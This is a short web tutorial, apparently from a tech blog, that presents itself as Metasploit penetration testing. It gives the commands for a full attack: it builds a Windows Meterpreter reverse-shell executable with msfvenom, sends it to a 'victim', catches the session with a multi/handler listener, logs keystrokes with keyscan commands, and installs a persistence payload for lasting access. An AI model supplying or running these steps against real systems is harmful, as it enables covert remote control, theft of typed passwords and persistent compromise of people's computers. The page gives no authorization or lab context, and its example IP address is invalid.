Remote Keylogger Attack using Metasploit | Penetration Testing | J Techcode

Remote Keylogger Commands

Meterpreter >keyscan_start
Starting keystroke sniffer
Meterpreter >keyscan_stop
Stoping keystroke sniffer
Meterpreter >keyscan_dump
Dumping keystrokes 
Meterpreter >keyboard_send

Now create payload 

Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber -f exe>filename.exe


  • Run this command and wait for 2 mints.
  • Now payload was created
  • open your [ Metasploit-framework/bin/ ] Folder check your exe file
  • Now send the exe file to victi

Now Open Metasploit Framework

  • Open command prompt in this path [ Metasploit-framework/bin/ ]
  • msfconsole (if not work give this command msfconsole.bat )
  • Now Metasploit framework opened
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp 
  • set LHOST yourip
  • set LPORT portnumber
  • exploit
  • Now started reverse tcp handler : 4444
Now server waiting for victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )
  1. Now Meterpreter session opened
  2. Type "help" command to know all commands
  3. sysinfo and more commands.

Persistence Attack

In meterpreter session to start the persistence attacking

  • run persistence -h
  • now it can show how to use commands 
  • run persistence -U -i 20 -p portnumber -r yourip
  • Eg : run persistence -U -i 20 -p 4444 -r 123.323.4.241
  • hit enter to run the command
  • now it can automatically inject the persistence payload into victim system
  •  Then any time you access the victim system